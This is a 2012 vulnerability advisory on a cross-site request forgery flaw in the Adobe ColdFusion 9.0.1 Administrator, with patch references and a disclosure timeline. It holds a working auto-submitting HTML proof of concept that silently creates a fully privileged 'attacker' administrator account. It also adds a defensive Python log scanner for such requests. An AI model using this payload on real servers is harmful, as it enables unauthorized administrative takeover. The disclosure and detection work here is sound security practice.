Wednesday, April 25, 2012

Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability

Description
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.


Proof of concept
<html>
<body>
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">
<input type="hidden" name="uname" value="attacker" />
<input type="hidden" name="password1" value="passwd123" />
<input type="hidden" name="password2" value="passwd123" />
<input type="hidden" name="Description" value="" />
<input type="hidden" name="userallowrds" value="true" />
<input type="hidden" name="userallowadministrative" value="true" />
<input type="hidden" name="userallow" value="adminapi" />
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />
<input type="hidden" name="adminaction" value="add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
Adobe has released patches which address this issue. Please see the references for more information.
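
To check whether the request shown in the proof of concept has reached a server, the following script scans web access logs for POSTs to the user-edit page that did not originate from the Administrator's own pages. It is an added example, not part of the original advisory or of Adobe's fix; the NCSA combined log format, the host name admin.example.internal and the sample log lines are assumptions constructed for illustration.

```python
import re

from urllib.parse import urlsplit

# Endpoint taken from the proof of concept in this advisory (compared case-insensitively).
ADMIN_PATH = "/cfide/administrator/security/useredit.cfm"

# Assumption: access logs use the NCSA "combined" format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample lines; admin.example.internal is a hypothetical host name.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "POST /CFIDE/administrator/security/useredit.cfm HTTP/1.1" 200 5120 "http://admin.example.internal:8500/CFIDE/administrator/security/useredit.cfm" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2012:10:07:42 +0000] "POST /CFIDE/administrator/security/useredit.cfm HTTP/1.1" 200 5120 "http://other-site.example/page.html" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2012:10:09:13 +0000] "POST /cfide/administrator/security/useredit.cfm HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2012:10:11:00 +0000] "GET /CFIDE/administrator/security/useredit.cfm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def referer_host(referer):
    """Return the lower-cased host of a Referer value, or None if absent."""
    try:
        host = urlsplit(referer).hostname
    except ValueError:
        return None
    return host.lower() if host else None

def find_suspect_posts(lines, trusted_hosts):
    """Flag POSTs to the user-edit page that did not come from the admin UI."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["target"].split("?", 1)[0].lower() != ADMIN_PATH:
            continue
        host = referer_host(m["referer"])
        if host in trusted:
            continue  # submitted from the Administrator's own pages
        reason = "cross-site Referer" if host else "missing or unparseable Referer"
        hits.append({"ip": m["ip"], "time": m["ts"], "reason": reason})
    return hits

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG, {"admin.example.internal"}):
        print(hit)
```

Access logs do not record the POST body, so a hit cannot distinguish a user add from an edit; treat each one as a prompt to review the Administrator's user list for unexpected accounts.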

References

Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.
